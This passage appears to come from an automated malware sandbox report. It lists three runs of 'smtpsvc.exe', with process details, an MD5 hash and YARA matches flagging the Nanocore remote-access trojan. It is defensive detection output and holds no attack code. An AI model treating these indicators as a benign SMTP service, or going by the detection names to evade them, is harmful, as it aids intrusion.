              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Analysis Process: smtpsvc.exe PID: 2192 Parent PID: 2796

              General

              Start time:11:57:06
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):false
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Analysis Process: smtpsvc.exe PID: 2196 Parent PID: 2668

              General

              Start time:11:57:06
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Analysis Process: smtpsvc.exe PID: 344 Parent PID: 2796

              General

              Start time:11:57:07
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Disassembly

              Code Analysis

              Reset < >